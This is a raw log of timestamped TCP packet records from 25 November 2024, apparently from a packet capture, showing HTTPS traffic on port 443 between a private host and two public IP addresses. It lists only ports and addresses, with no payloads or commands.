Nov 25, 2024 14:47:25.970995903 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.971044064 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.977344990 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.977363110 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.977446079 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.977456093 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.977520943 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.983364105 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.983380079 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.983458996 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.983467102 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.983513117 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.989784956 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.989801884 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.989912987 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.989921093 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.989972115 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.996140003 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.996156931 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.996253014 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:25.996260881 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:25.996309996 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.153924942 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.153947115 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.154036999 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.154074907 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.154150009 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.159769058 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.159787893 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.159857988 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.159867048 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.159913063 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.166244030 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.166258097 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.166341066 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.166347027 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.166384935 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.172574997 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.172589064 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.172655106 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.172669888 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.172704935 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.178150892 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.178165913 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.178240061 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.178246975 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.178287983 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.184242010 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.184257984 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.184319973 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.184326887 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.184371948 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.190643072 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.190658092 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.190747976 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.190756083 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.190804958 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.196866035 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.196882010 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.196962118 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.196968079 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.197009087 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.356112003 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.356147051 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.356216908 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.356256962 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.356276035 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.356298923 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.361816883 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.361835003 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.361897945 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.361910105 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.362080097 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.368140936 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.368155956 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.368257999 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.368274927 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.368323088 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.374598980 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.374620914 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.374684095 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.374691010 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.374730110 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.380377054 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.380390882 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.380567074 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.380573988 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.380619049 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.386972904 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.386989117 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.387058973 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.387064934 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.387115002 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.392700911 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.392716885 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.392797947 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.392805099 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.392848969 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.398906946 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.398922920 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.398993015 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.398998976 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.399043083 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.558312893 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.558346033 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.558434963 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.558474064 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.558489084 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.558518887 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.563544035 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.563560009 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.563636065 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.563642979 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.563687086 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.569766998 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.569782972 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.569859028 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.569864988 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.569906950 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.576205015 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.576222897 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.576318979 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.576324940 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.576371908 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.581793070 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.581809998 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.581856966 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.581862926 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.581892967 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.581907034 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.588618040 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.588637114 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.588701963 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.588711023 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.588752985 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.594245911 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.594261885 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.594341040 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.594348907 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.594398022 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.600512028 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.600528002 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.600601912 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.600609064 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.600655079 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.759305954 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.759371042 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.759398937 CET	443	49737	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:26.759439945 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.759519100 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:26.844535112 CET	49737	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:38.570637941 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:38.570714951 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:38.570782900 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:38.577569962 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:38.577616930 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:39.558168888 CET	49740	443	192.168.2.4	104.26.13.205
Nov 25, 2024 14:47:39.558231115 CET	443	49740	104.26.13.205	192.168.2.4
Nov 25, 2024 14:47:39.558415890 CET	49740	443	192.168.2.4	104.26.13.205
Nov 25, 2024 14:47:39.565144062 CET	49740	443	192.168.2.4	104.26.13.205
Nov 25, 2024 14:47:39.565165997 CET	443	49740	104.26.13.205	192.168.2.4
Nov 25, 2024 14:47:39.803981066 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:39.804081917 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:39.845855951 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:39.845881939 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:39.846168041 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:39.891242027 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:39.899899006 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:39.947338104 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:40.791948080 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:40.791990042 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:40.792016983 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:40.792082071 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:40.792107105 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:40.792169094 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:40.792175055 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:40.792184114 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:40.792216063 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:40.792218924 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:40.792258024 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:40.792263985 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:40.792273998 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:40.792366982 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:40.792373896 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:40.799897909 CET	443	49740	104.26.13.205	192.168.2.4
Nov 25, 2024 14:47:40.799972057 CET	49740	443	192.168.2.4	104.26.13.205
Nov 25, 2024 14:47:40.802634954 CET	49740	443	192.168.2.4	104.26.13.205
Nov 25, 2024 14:47:40.802650928 CET	443	49740	104.26.13.205	192.168.2.4
Nov 25, 2024 14:47:40.802866936 CET	443	49740	104.26.13.205	192.168.2.4
Nov 25, 2024 14:47:40.844347000 CET	49740	443	192.168.2.4	104.26.13.205
Nov 25, 2024 14:47:40.844367027 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:40.868577003 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:40.912659883 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:40.912724972 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:40.912746906 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:40.916804075 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:40.916852951 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:40.916863918 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:40.933531046 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:40.933585882 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:40.933604956 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:40.941987991 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:40.942087889 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:40.942094088 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:40.942121983 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:40.942162991 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:40.950474024 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:40.952155113 CET	49740	443	192.168.2.4	104.26.13.205
Nov 25, 2024 14:47:40.959319115 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:40.959373951 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:40.959410906 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:40.967628002 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:40.967788935 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:40.967801094 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:40.976002932 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:40.976246119 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:40.976258993 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:40.984596968 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:40.984807968 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:40.984822035 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:40.999332905 CET	443	49740	104.26.13.205	192.168.2.4
Nov 25, 2024 14:47:41.031873941 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.031904936 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.036902905 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.037023067 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.037038088 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.047566891 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.047646046 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.047702074 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.047749043 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.049845934 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.056047916 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.064625978 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.064861059 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.064907074 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.073095083 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.073225021 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.073272943 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.089984894 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.090102911 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.090146065 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.090296984 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.106867075 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.106878996 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.107062101 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.115573883 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.115669012 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.123864889 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.123873949 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.124022007 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.153383970 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.153394938 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.153470993 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.159409046 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.159547091 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.167576075 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.167692900 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.171272039 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.171344042 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.179218054 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.179404020 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.187391996 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.187779903 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.193527937 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.193589926 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.202076912 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.202203035 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.210242987 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.210443020 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.212322950 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.212450981 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.220493078 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.220561028 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.228885889 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.228998899 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.236179113 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.236296892 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.244518995 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.244698048 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.252476931 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.252563000 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.254445076 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.254575968 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.274988890 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.275073051 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.279813051 CET	443	49740	104.26.13.205	192.168.2.4
Nov 25, 2024 14:47:41.279865980 CET	443	49740	104.26.13.205	192.168.2.4
Nov 25, 2024 14:47:41.279962063 CET	49740	443	192.168.2.4	104.26.13.205
Nov 25, 2024 14:47:41.281810045 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.282036066 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.284499884 CET	49740	443	192.168.2.4	104.26.13.205
Nov 25, 2024 14:47:41.285049915 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.285185099 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.290136099 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.290235043 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.295703888 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.295842886 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.301089048 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.301203012 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.303793907 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.303883076 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.307720900 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.307898045 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.313306093 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.313399076 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.317420959 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.317651987 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.319829941 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.319900990 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.324383974 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.324543953 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.329459906 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.329586029 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.333174944 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.333259106 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.335479975 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.335562944 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.339420080 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.339508057 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.341593981 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.341666937 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.345592976 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.345695972 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.349343061 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.349417925 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.353213072 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.353318930 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.361135006 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.361143112 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.361186028 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.361227036 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.361246109 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.361272097 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.373469114 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.373485088 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.373668909 CET	49739	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:41.373699903 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.383317947 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.383332014 CET	443	49739	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:41.383645058 CET	49739	443	192.168.2.4	172.67.129.178
